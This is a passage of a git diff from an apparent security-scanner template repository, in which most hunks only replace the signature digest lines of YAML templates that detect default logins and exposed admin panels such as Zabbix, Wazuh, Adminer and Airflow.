490a00463044022077f7dbd7c50db82f80d82e6ee234480f22902da10583351bd3a36193999e5d08022024b534bb71d7933f1bdc11a7cda6962359609655e1df2e567be4f77eecf8fc65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml index 07fb4f6937..31025377bc 100644 --- a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +++ b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml @@ -42,4 +42,4 @@ http: - 'contains(body, "token\":")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502200acef2ad5135fd4b7c240538331396ec3066b4d54b992ea622574bcea98ede8d022100ce29a2323d606b29f77387ad8742ee9602a8afda2a474d96f068dfa6b6c019a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aee82448d2b859ebed86fa4a6d5ee4815eb4371ad4a7f08f76d00826ad289368022065b78bff7ec88bb376d4e6ad0f0d1ec68bf92441cb0df53c92db0b09b22b2369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/next-terminal/next-terminal-default-login.yaml b/http/default-logins/next-terminal/next-terminal-default-login.yaml index 1e5d1c9dff..3236d07384 100644 --- a/http/default-logins/next-terminal/next-terminal-default-login.yaml +++ b/http/default-logins/next-terminal/next-terminal-default-login.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022047000b6be585f125bb59e74eaa3738df10e5fedd6f7f79daf80c87bd334d0244022100aa08bbf3a773e10611aa8076f9ead21582e2b7e190382f247d48976fb5618328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ea452aa3edf4359543aeba89e001e84f36f779367d8c76129f154627ccbdb52022100ad72c1438aec12604dcf1c7b0eadd55dabe7e0e05424f32bf81e21c9e43624f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/pentaho/pentaho-default-login.yaml b/http/default-logins/pentaho/pentaho-default-login.yaml index 3498eacd35..18cf2bb441 100644 --- a/http/default-logins/pentaho/pentaho-default-login.yaml +++ b/http/default-logins/pentaho/pentaho-default-login.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 302 - -# digest: 490a0046304402207879c4c3d158c1befbc85369695e7c809e1c3321bfd3f41c3c14de63f25a565202206992c6b32c87dcec119c635edb212470f39effb0255284d3fa477e3581a0722e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f94a93c2846615bada88a7601c151a2a077f1a5dc685091ba32f0b843a6b835202205b1740da45db8dfc7709ac56c987e64787ed3bb553493621319effc696b43593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/soplanning/soplanning-default-login.yaml b/http/default-logins/soplanning/soplanning-default-login.yaml index 7e628a37e3..a864c3b419 100644 --- a/http/default-logins/soplanning/soplanning-default-login.yaml +++ b/http/default-logins/soplanning/soplanning-default-login.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b3d86e9e10bde636e6ff84016fd5241457bcac181d4c2b3192a646880f744dc902205cb3645bb990dc1492bf69406d5d8bdf9cfb6c1f2673f843d980c65713f09a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed3e90edb887b3afe18c82dc97b8cafed0afec1caa9805760b7b25ed0c8061b402203df1005a13d3becd420466f831f1cae1d89797f5c40c5a0dd90fd71c417b2d96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/structurizr/structurizr-default-login.yaml b/http/default-logins/structurizr/structurizr-default-login.yaml index a27eae52ac..c4f830c66e 100644 --- a/http/default-logins/structurizr/structurizr-default-login.yaml +++ b/http/default-logins/structurizr/structurizr-default-login.yaml @@ -61,5 +61,4 @@ http: regex: - 'name="_csrf" value="([0-9a-z-]+)"' internal: true - -# digest: 490a00463044022000bee996e0a22c9c6fc5cf0762ecaeee4e63c7b49cd44bedf30c15279c7323f402204e76001706df14f1509bf3dcbed38250e5ab7e925e877eea06fcb29b85d84f04:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022016aa85f49f5226bbeceb6908dae2fe5c9f9e4bea974ea8033fc2df4d8009515c022100d58b7a86bb985ee3cdae003b41130d3d9f3aca9396e309bb83d63da4a2ca59bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/timekeeper/timekeeper-default-login.yaml b/http/default-logins/timekeeper/timekeeper-default-login.yaml index f7155cda24..80093aa2e0 100644 --- a/http/default-logins/timekeeper/timekeeper-default-login.yaml +++ b/http/default-logins/timekeeper/timekeeper-default-login.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207d17c8359af61021decdaba59da226acf87ee8cdba8e3fb902695de3029e9547022100c67b56b1c80cebea6a8dcf167e09be028622328147e4cbbab6e8e4bbebfb1a9c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200167fb19f67315e12bb1973948e435706d6a0d0929b59c107376883031e4a0f902200652bd3ca5216abfa80724d862d5a5207345253ddc78a81d23785cabd86d6790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml index 550b41dad8..bb7941c4d8 100644 --- a/http/default-logins/wazuh-default-login.yaml +++ b/http/default-logins/wazuh-default-login.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab2051c304c035f5529f66430ea1105c4cf31c1d8f5ff87e994cf6f1061c1f7202204a9b106ace1ff87641cc961e9aa127bed0852ca04614f8d5ef2ed286a17d85bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/xxljob/xxljob-default-login.yaml b/http/default-logins/xxljob/xxljob-default-login.yaml index 25015851a7..104c147ec3 100644 --- a/http/default-logins/xxljob/xxljob-default-login.yaml +++ b/http/default-logins/xxljob/xxljob-default-login.yaml @@ -62,5 +62,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ae974bb59eb8265058d71d65ba977414da678ac9714b4de0271be9aaad80162e022100c5e2778b9fd6d3563f74836c593566f4319ec48c6de63b985cbb63aaf0701491:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200c145af892aa3abf672da329d31e296cc91ff64cf70c45c86ea32c3b08bf786e02204b533085635f6f4ba005d66179b8283889032c6b226b8c2a523ff1f6b8108233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/zabbix/zabbix-default-login.yaml b/http/default-logins/zabbix/zabbix-default-login.yaml index 6da48b963c..c8910d4a06 100644 --- a/http/default-logins/zabbix/zabbix-default-login.yaml +++ b/http/default-logins/zabbix/zabbix-default-login.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502206c2b96efb385e67d611c7276844293bc88783570392f427628e2a4c05dd7a3b502210094b16a3c48cce397175fe585743b9e87e3db962d6a73a6ec20ca8c5881c9a8be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e8039b865b54ee0e55901abd00344110d74f2062b071b8f79d2b3e95a6f97f902203e2a3ff1cd9d452d38caa938749b26f58f6bc699ec304a7ef544d3b357e63715:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/3cx-phone-management-panel.yaml b/http/exposed-panels/3cx-phone-management-panel.yaml index 3c0392dcb7..ce22cf23f1 100644 --- a/http/exposed-panels/3cx-phone-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-management-panel.yaml @@ -43,4 +43,4 @@ http: - "3CX Phone System Management Console" - "Welcome to the 3CX Management Console" condition: or -# digest: 4a0a0047304502203780f52a668c97f351e08942ed81928742a986b3844ec6ea48dd292d385e8996022100bf37bba4863af2671c39d779c0290d83f3c3eccd6563353643d25c2154d7fc1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207223b1de24511de428c99eea66db61e5d1f7874fcfb760ab91d02602025df3b60220701914f284614ab2d3e67d208297155a3c9f7ac21c6ca1ba9397152e45c68c63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml index a89d3de0d1..8cb041ca8e 100644 --- a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml @@ -43,4 +43,4 @@ http: - " <title>3CX Webclient" - '' condition: or -# digest: 4a0a00473045022100f60c410ca197feff3a6ae75f85110d48d1de1eed7b721fcdc802e824bcbf1dbb02202150b4cc1ee3346432bbb961f31f63d085928cad61b631852434da1a9e690232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a5151965ace29d1dafc3469f50c2f7136477a080501769e7a13e5fbafe83117022100968191d985f1a1153be61bb5e77cd24f615b998e60d6c7815f6d87226274a26c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acemanager-login.yaml b/http/exposed-panels/acemanager-login.yaml index aea1a4edc6..cec876182e 100644 --- a/http/exposed-panels/acemanager-login.yaml +++ b/http/exposed-panels/acemanager-login.yaml @@ -39,4 +39,4 @@ http: part: body regex: - 'ALEOS Version ([0-9.]+) \| Copyright &co' -# digest: 4a0a00473045022044705dff86109f891e630e39f981bfbca44cbef4cce7cdb9c760c2a860f07e59022100e2dedc81057f3fb8f2a4d7d3cf916ec5415ce7b69c058cb38f6989a4812307e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f2f4fe267d65eaf48fd3b478babdde167d3b6d124b63ee7b6b81d49491686d6022100b2398bc9306970b929162d3d6c19208a2ef2f024b366766343141daa252f29d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acenet-panel.yaml b/http/exposed-panels/acenet-panel.yaml index 19ea69fdea..5d0eb5d734 100644 --- a/http/exposed-panels/acenet-panel.yaml +++ b/http/exposed-panels/acenet-panel.yaml @@ -26,4 +26,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207267b35936d9aeb6cc4a04e7d12e755474f0ef18bc419f376706117f22a55b27022100f5916908fe214a72ab7ff4a5deb4d32503fa2f849f324b08e5b3911f0564ad1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220141c0f75e02469ee26415d050c17cf9c6fa067ed0c566774161ada40dde84880022025e247aac0c5489fb7c8069bc74978139ff650331c3b530977967fbe4b491a76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index 075097244e..f51c441d8c 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -28,4 +28,4 @@ http: - 'status_code==200 && contains(tolower(body), "ackee")' - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" condition: or -# digest: 4b0a004830460221008f061832211cdc60b4f105a9623e07e810e376ebd87114c6c5d1a44384f7a50d022100e0170bd8a83aeb161c606e362f8752d638435fca57bf17b2b09f76dd7caa9350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f645629478b7a13ff535d409593f27801c6655a59cb6367f49e278c2e4c2375302210085a790abbb23134ab6c91ee665383cb897aecea77a535a7df18463dff7f86ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acrolinx-dashboard.yaml b/http/exposed-panels/acrolinx-dashboard.yaml index 5cd589e7ae..f9d44560c5 100644 --- a/http/exposed-panels/acrolinx-dashboard.yaml +++ b/http/exposed-panels/acrolinx-dashboard.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205965d1f8f3014c3afa77c395ccd721fb9d246c033490941dc9a4a2144ce9079d02204aa25b74e616928bf04e4e7001533d146ffe81a887963fd91dd6c902341394bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ab3ccc9d4ae0f949b14bc92cf47dd734298f7cbee9c1c035c181cac138a87a4022100c5fe5efa7bbba122af60b42ed58950445913d49d4088c1eea6c3b2f86e5365bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml index a642e64f7e..b98a8bd69b 100644 --- a/http/exposed-panels/acti-panel.yaml +++ b/http/exposed-panels/acti-panel.yaml @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100886ee667fdd7be168381aefee8bb43b68e265fcaf00e08e264018d0480f4858302201ec09ff056d43319aabb9f66204cc95b11edac9ee877aaa5c4b25b0fe0db1c2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/active-admin-exposure.yaml b/http/exposed-panels/active-admin-exposure.yaml index d23836b80d..875f1cd2d3 100644 --- a/http/exposed-panels/active-admin-exposure.yaml +++ b/http/exposed-panels/active-admin-exposure.yaml @@ -27,4 +27,4 @@ http: - "active_admin_content" - "active_admin-" condition: and -# digest: 4b0a004830460221008ff7c3e5ca9ea60724d5aa6d320d161dad483cbbe185ad21cda9f0bc96afe14002210096167ed3964f4ff49a5ac96d58bbfb00c29ee1301adad51286857d0cd9f279b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cba5c8e35d6d0ccdc32f0cc069ea5fabf9677df3afa1ae620f7bcc2ca57cda2a022100841902f40d7cd5d9853308a9d279c022a8df5e94892d9ff4cd31d652b717eb70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/activemq-panel.yaml b/http/exposed-panels/activemq-panel.yaml index 46ad98de97..0ee31cbff8 100644 --- a/http/exposed-panels/activemq-panel.yaml +++ b/http/exposed-panels/activemq-panel.yaml @@ -30,4 +30,4 @@ http: - '<h2>Welcome to the Apache ActiveMQ!</h2>' - '<title>Apache ActiveMQ' condition: and -# digest: 4a0a0047304502206c143bc3e4e0af4742044d95c50fe48e84f75d59138f4929bce3fc53f2f14090022100e52ac76beab4ea68c78856d78fc874725d38389f0d4cb5da0c6a0e12223eabe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200680997e4c289c87060383d51f4bb6961f032074940d7a88d3138c2409d5d33d022034ae36716fa244b3aeac8f14f6396f8559ca6197384d895d23af31b722998851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acunetix-login.yaml b/http/exposed-panels/acunetix-login.yaml index 582c056aac..7d7dcd0165 100644 --- a/http/exposed-panels/acunetix-login.yaml +++ b/http/exposed-panels/acunetix-login.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d5cb967d632d9fe78d48b71dbf15a42b83f214f2f5418926c45d471bb980605022100a298f9a1bd77c2f13b4575c74a8309e0bbf2e6973187f6a2a34df0909be17576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3e0a36f23ada0e56b591d0157c75e124b21bda54ba9b3420bfb0a9bd53dc8430220756e3635374e9bcb62d53bd2c01ec6e7e51d7b68a5ae5dfde55c90058f3e66e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/addonfinance-portal.yaml b/http/exposed-panels/addonfinance-portal.yaml index 159c1d8ada..d3db3cffc8 100644 --- a/http/exposed-panels/addonfinance-portal.yaml +++ b/http/exposed-panels/addonfinance-portal.yaml @@ -26,4 +26,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ee3ebff11567dbbf51ce9c7a22464e36fe9204b034b22fc7a14b81e0d7f584a70220789eec08d407b306b4fe49b64f565aeba67ffa9d3817091e91784a243f42f11a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ad483e2a89e05c46feba8e9689808f7cbf607abe51890010a2c55c795f17671022100d630feb47530f6e125f346d06ba30b99256b0c4fa238e84f0431c0b4da844ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adhoc-transfer-panel.yaml b/http/exposed-panels/adhoc-transfer-panel.yaml index 2721f51b07..d501e25dc4 100644 --- a/http/exposed-panels/adhoc-transfer-panel.yaml +++ b/http/exposed-panels/adhoc-transfer-panel.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201bbd8e99562d715f0264d0492ba913fa6d3cf53694a8747a24043f25f74f3d0a02205a28ff4f92dbf4cd94ad0953664911a8eee6bb5e0ab93a5e020bd71b18421b87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d193f82f9182396e714401804b3680b69b019186c884b3a4ec8e142256cf2af2022100c9d7b7bdc64aa0823b33726b281b2a6111d660cc839668083ba4693e0a5c47f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adiscon-loganalyzer.yaml b/http/exposed-panels/adiscon-loganalyzer.yaml index a1bf3da61d..07edf97dfb 100644 --- a/http/exposed-panels/adiscon-loganalyzer.yaml +++ b/http/exposed-panels/adiscon-loganalyzer.yaml @@ -42,4 +42,4 @@ http: part: header words: - 'text/html' -# digest: 4b0a00483046022100c241b2782da3ebdfa49a2fb64590aea15664a4b46e973b63a485d1a15c6963b6022100be3e015ad635bbf8711a6db7b2040aff4e50bfc2e6ab80886ac177ca158f3a9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220710f66d43a28354834212f505c80c3d4dd2b22c7479bea5a29495e76a291b99c022061b7d965f84c43f295aa47f631447bbb44162c7f496881cd72f2c6ad6023a564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index 848589f8d1..c25eadd539 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -57,4 +57,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4a0a00473045022100d9b52eb14eff5244681c7c9c5a0ba690f0ede3ae8be5a5a1cc836129feba30a502203b460896e6054121461e4687a0095f7067154c0c0aa8acfee98515857bdf1775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a33af2d5ccddd23e8cbb62e3bea51d3a3c9b33713ec8cfce4f124231105a89e6022100c0300b40409d563efda7769a7d1b82088ca29941066d704ae460b532c6f0172e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminer-panel.yaml b/http/exposed-panels/adminer-panel.yaml index 132301fc15..5601a70c21 100644 --- a/http/exposed-panels/adminer-panel.yaml +++ b/http/exposed-panels/adminer-panel.yaml @@ -60,4 +60,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4a0a004730450221009f8f183a3f1aec4c1776bf24cac3abdc9c202b8cfb15c67232040d447a26d38002205f8ef54880eb471987d6c3757c50571a8a3d9df53d5a279b803e99ac75521ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ce0b5960f5fe32a8e390234c8a7c22b5a542baee68cda8e707f2206ecb06087022100fdd8f01155bc72d801c1699b299a664478f5bc3b4c62096d65c5f595a1f2d1e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminset-panel.yaml b/http/exposed-panels/adminset-panel.yaml index 7a2b289842..7ca59ecbe8 100644 --- a/http/exposed-panels/adminset-panel.yaml +++ b/http/exposed-panels/adminset-panel.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009675e2dfb0b94115aff6147949e37c234e508f1099adcd15050efe8a97421f4102204280dba047d6e4823c61339dd8a23534b8d7bd063b2d617c5c455d2aa8f18dd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220786946d4e5a4779b6be435e975aa67091deb2a155a4354a615a5655ea2073f89022100be553711adc43157228142edcaf1356e10cb96d905f829f2427ed6d07b0e42d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/adobe-component-login.yaml b/http/exposed-panels/adobe/adobe-component-login.yaml index a3f231c71a..1dd1f42444 100644 --- a/http/exposed-panels/adobe/adobe-component-login.yaml +++ b/http/exposed-panels/adobe/adobe-component-login.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220703b43ad652157d7cfa4c62f36643fd22f3e471b5e1ce46f446e74a5bb717fd4022100a1768401ea9cdff2b7b38a6f2e1b5ac302c4800311ce26ae47a35dab174fd117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085fcaeb0e212b7c072e66534c6141c023bafd70bf896ed1538ff0158d38af3e102207f57cc30331e2add974f3e8e301e55ea2c1ee6c117a751419ca2385cdd7b6847:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/adobe-connect-central-login.yaml b/http/exposed-panels/adobe/adobe-connect-central-login.yaml index ef465ca174..8dd46ecc32 100644 --- a/http/exposed-panels/adobe/adobe-connect-central-login.yaml +++ b/http/exposed-panels/adobe/adobe-connect-central-login.yaml @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207fdc0717180f5c3a2962899d5f7e7dd6ab5af7f30f958f5a8ed4d821d284d492022100f42f33d6101fbbd3889b206a59c44d6a643ef27af203b1f34507d97a5b0a7f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c876f18c787ac5cb128ed24f93c259a65192e250e4beb87772a8782aabd6d321022100cdd90845a695d4b16f31befa68a814a8de062c71a295594d642b4467dd191838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml index 305804d2c7..6eac469f3d 100644 --- a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml +++ b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207f18e3670ddcebc689137819479658379c644f0ed75215d0e356338a5b4921c80221009cf8e3d0ba031262e5483191b0834d64b86dd60051bdd1ca0567bc297e891dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef71ed24e29f888e5a4ba8157b4103fcf3dfcc76e7c7636df1deca0942a7375e022100b7dd1594482e9202f67d9e0a026dec5abec308ebfacd8bc09b811a1f3630ba7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/aem-crx-package-manager.yaml b/http/exposed-panels/adobe/aem-crx-package-manager.yaml index 189a8ca8b0..d75a1dea5c 100644 --- a/http/exposed-panels/adobe/aem-crx-package-manager.yaml +++ b/http/exposed-panels/adobe/aem-crx-package-manager.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c0e2de79d2fdca7c3e2b3188880dea5c570ffe0792ada4615862565a7b3c64f02202d0234c0e32c7f6d32146dd9b8a3814b053575aa7ee1a48c0f0b361ac4aa57d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210080df3aa73e1af3a3b21b4268af41242be9a0d0f447a84c67d51af9fa1206269f022006d1dd7b7f82f3192f87a14c047062ba6388b19874c42cd9175aac1a68984179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/aem-sling-login.yaml b/http/exposed-panels/adobe/aem-sling-login.yaml index e97a29effe..26facb94cc 100644 --- a/http/exposed-panels/adobe/aem-sling-login.yaml +++ b/http/exposed-panels/adobe/aem-sling-login.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009ebb04f07ba4604d3d6fe1b930ae1351e6ee34bb6b7f13ce850c1336f4cebc52022013841f057144f9de90e3361a59164c69e741d22c87cd860f7c4bb3d6b6c9b2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220018d2e371edac7d420df30d109b501f17b583c682e3af1228780152edf20904b0220669edda0b2f1b358140f2cbb6e9a1e4e8dabd4bce7cd2ee745d5139aebc8313a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aircube-dashboard-panel.yaml b/http/exposed-panels/aircube-dashboard-panel.yaml index 5366b7d2b5..79ab4f6fe9 100644 --- a/http/exposed-panels/aircube-dashboard-panel.yaml +++ b/http/exposed-panels/aircube-dashboard-panel.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fd6c23985fea3ea42e77ba203a8fce9e43333562673cb0c2706f59e22201f712022005c769ad7b436b5b9b0b4d507d901e3d8c2170ddad219dbafed8d890899a7dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5af67268d961cd4856f5808774eaeaa35c49d04408c0f33e325dd648cb4ca32022100b7f08a862ffbfd4d633dab083729b514115fbb0a95c4e5f19cb1ef2160abc4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aircube-login.yaml b/http/exposed-panels/aircube-login.yaml index 17523cdbb2..66c87ef5ea 100644 --- a/http/exposed-panels/aircube-login.yaml +++ b/http/exposed-panels/aircube-login.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0cde8a94d9a87777fa4576699697df9a9bc6161482e374b8c93950042d73e6e02206095562164b4e93fd6ab403958fceedb86401484f02abf53c70b62888d428e78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057fb9a047f901b76ea05b3d4d9a7f0c03bf623505b92411811e8d4d43013b5be022100bef2d505c08ccb84b6d838ee36c64039e98ec6d9c239cc217391606d52ed87b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/airflow-panel.yaml b/http/exposed-panels/airflow-panel.yaml index 2a8e11bb47..5520a77b80 100644 --- a/http/exposed-panels/airflow-panel.yaml +++ b/http/exposed-panels/airflow-panel.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eb0dd6f900e0a25540a87511757830536aff2963facff3165c0ffb3b04e26dcd022100b862fb6a05ed472db0f7a913c1f26bfa3a8325cda393d7e4a393d84f97d032c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc4ac3e99c4d82e8eabf5b70e0247c70d06b1ad17fb6012626e065c482b21d420220669fd742ca21a054b7979f267c42c40ec197f30e3e52c4c6bf7ebf5ac63ccc3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/airnotifier-panel.yaml b/http/exposed-panels/airnotifier-panel.yaml index 71b8f12080..732ba710b1 100644 --- a/http/exposed-panels/airnotifier-panel.yaml +++ b/http/exposed-panels/airnotifier-panel.yaml @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207fb28075cac9c1b3e06234ce965a9e715df9fd9d77688d7be5e867d37c08fb93022062bfb7fd3f956b5ddb44e1a53fd4df73afac4846df3ffe9835895ec2a4fa40a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9df80c397b93cee6dbf34e98ec3e59549765504c37befd532db0058575bf96502207397e167834a50decdc389f3019bea5d5f5729624dce005b66637d168d8382fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/akamai-cloudtest.yaml b/http/exposed-panels/akamai-cloudtest.yaml index 25af9fef39..1650540efd 100644 --- a/http/exposed-panels/akamai-cloudtest.yaml +++ b/http/exposed-panels/akamai-cloudtest.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204784d969cbbfb1472d923905a78cac56c1695004b9305686bd10da59cc48470902210096cb5382dc5689ee1188f42f1410a9806ea23d4e59b95f2aefaf9821d55cde70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206675dce6c5b24a3a4332f2542b981f6d750c5198bbb12f5b31afd29426adbc670221009e93de8b37f1b02634e062ee5db01a807f0e8a3a68ca08fc47f19cc7b3fb74c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/alfresco-detect.yaml b/http/exposed-panels/alfresco-detect.yaml index 04a6c1f98e..365b3709f6 100644 --- a/http/exposed-panels/alfresco-detect.yaml +++ b/http/exposed-panels/alfresco-detect.yaml @@ -41,4 +41,4 @@ http: - 'Enterprise 